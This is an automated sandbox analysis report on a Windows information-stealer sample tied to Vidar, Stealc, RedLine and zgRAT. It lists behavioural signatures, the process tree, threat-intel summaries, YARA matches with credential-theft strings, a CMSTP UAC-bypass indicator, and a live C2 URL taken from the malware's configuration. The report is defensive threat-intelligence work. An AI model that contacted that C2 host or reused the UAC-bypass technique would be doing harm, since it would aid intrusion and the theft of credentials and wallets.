Edit tour

Windows Analysis Report
kO1P1YnLst.exe

Overview

General Information

Sample name:	kO1P1YnLst.exe renamed because original name is a hash value
Original sample name:	18d635dbc4392c2470eb97d1063e8484.exe
Analysis ID:	1432397
MD5:	18d635dbc4392c2470eb97d1063e8484
SHA1:	b4bd20a549e40d8b946a9bf5439004e6111100f9
SHA256:	38b68616e12f54f0ed94d719751a9534394f3435ef49fe967c1bba3d62d1a67f
Tags:	32exeStealc
Infos:

Detection

Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Mars stealer

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected Stealc

Yara detected UAC Bypass using CMSTP

Yara detected Vidar stealer

Yara detected zgRAT

C2 URLs / IPs found in malware configuration

Checks if the current machine is a virtual machine (disk enumeration)

Connects to many ports of the same IP (likely port scanning)

Found direct / indirect Syscall (likely to bypass EDR)

Found evasive API chain (may stop execution after checking locale)

Found hidden mapped module (file has been removed from disk)

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses known network protocols on non-standard ports

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries keyboard layouts

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

kO1P1YnLst.exe (PID: 6916 cmdline: "C:\Users\user\Desktop\kO1P1YnLst.exe" MD5: 18D635DBC4392C2470EB97D1063E8484)

u5c4.0.exe (PID: 416 cmdline: "C:\Users\user\AppData\Local\Temp\u5c4.0.exe" MD5: 15185ECF8919789DD51FB83FA01CB66B)

cmd.exe (PID: 2492 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

IIDHJDGCGD.exe (PID: 736 cmdline: "C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe" MD5: 6C93FC68E2F01C20FB81AF24470B790C)

WerFault.exe (PID: 3488 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 416 -s 2256 MD5: C31336C1EFC2CCB44B4326EA793040F2)

run.exe (PID: 7184 cmdline: "C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)

cmd.exe (PID: 7216 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 8056 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

u5c4.3.exe (PID: 7280 cmdline: "C:\Users\user\AppData\Local\Temp\u5c4.3.exe" MD5: 397926927BCA55BE4A77839B1C44DE6E)

SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (PID: 8120 cmdline: "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1 MD5: 8E9C467EAC35B35DA1F586014F29C330)

WerFault.exe (PID: 7392 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6916 -s 944 MD5: C31336C1EFC2CCB44B4326EA793040F2)

run.exe (PID: 8040 cmdline: "C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)

cmd.exe (PID: 8068 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 1524 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: Vidar

{"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\pasb	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\pasb	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\pasb	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
C:\Users\user\AppData\Local\Temp\khjsru	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\khjsru	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\khjsru	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
C:\Users\user\AppData\Local\Temp\u5c4.3.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000011.00000002.3041772140.00000240F7AE0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000005.00000000.1829719005.0000000000401000.00000020.00000001.01000000.0000000C.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000001.00000003.1743780115.0000000004300000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000003.1743780115.0000000004300000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000001.00000002.2500065620.0000000004354000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1650:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000003.1830645130.00000000070B3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000001.00000002.2500095496.000000000436A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000001.00000002.2499937738.00000000042D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000002.2499937738.00000000042D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000001.00000002.2499937738.00000000042D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1986065052.0000000004255000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0xba8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000F.00000002.2374551290.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.2374551290.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000003.00000002.2139879271.0000000006090000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.2139879271.0000000006090000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000012.00000002.2374844469.0000000000822000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000012.00000002.2374844469.0000000000822000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000011.00000000.2126631376.00000240F198B000.00000002.00000001.01000000.00000011.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: u5c4.0.exe PID: 416	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: u5c4.0.exe PID: 416	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: u5c4.0.exe PID: 416	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: run.exe PID: 7184	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 7216	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: cmd.exe PID: 7216	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 7216	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: run.exe PID: 8040	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 8068	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: cmd.exe PID: 8068	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 8068	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 1524	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 1524	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 37 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.u5c4.0.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.u5c4.0.exe.400000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
1.3.u5c4.0.exe.4300000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.3.u5c4.0.exe.4300000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
18.2.MSBuild.exe.820000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f7ae0000.11.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
18.2.MSBuild.exe.820000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
18.2.MSBuild.exe.820000.0.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
13.2.run.exe.37b586d.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
13.2.run.exe.37b586d.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f7ae0000.11.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
1.2.u5c4.0.exe.42d0e67.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.u5c4.0.exe.42d0e67.1.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
3.2.cmd.exe.56c5e64.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
3.2.cmd.exe.56c5264.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
3.2.cmd.exe.56c5264.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
3.2.cmd.exe.60900c8.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.cmd.exe.60900c8.8.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.2.cmd.exe.60900c8.8.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb684a:$s14: keybd_event 0xbd5b9:$v1_1: grabber@ 0xb741c:$v1_2: <BrowserProfile>k__ 0xb7e95:$v1_3: <SystemHardwares>k__ 0xb7f54:$v1_5: <ScannedWallets>k__ 0xb7fe4:$v1_6: <DicrFiles>k__ 0xb7fc0:$v1_7: <MessageClientFiles>k__ 0xb838a:$v1_8: <ScanBrowsers>k__BackingField 0xb83dc:$v1_8: <ScanWallets>k__BackingField 0xb83f9:$v1_8: <ScanScreen>k__BackingField 0xb8433:$v1_8: <ScanVPN>k__BackingField 0xa9c62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xa956e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
15.2.cmd.exe.57f9264.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
1.2.u5c4.0.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.u5c4.0.exe.400000.0.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f79a0000.10.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f79a0000.10.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.cmd.exe.57f9e64.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
3.2.cmd.exe.56c5e64.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
15.2.cmd.exe.57f9264.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
2.2.run.exe.450d86d.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
2.2.run.exe.450d86d.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
15.2.cmd.exe.57f9e64.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
15.2.cmd.exe.5dd00c8.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.cmd.exe.5dd00c8.7.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
15.2.cmd.exe.5dd00c8.7.raw.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
2.2.run.exe.4551d5b.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
2.2.run.exe.4551d5b.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
13.2.run.exe.37f9d5b.7.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
13.2.run.exe.37f9d5b.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
15.2.cmd.exe.57b5976.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
15.2.cmd.exe.57b5976.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
3.2.cmd.exe.60900c8.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.cmd.exe.60900c8.8.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
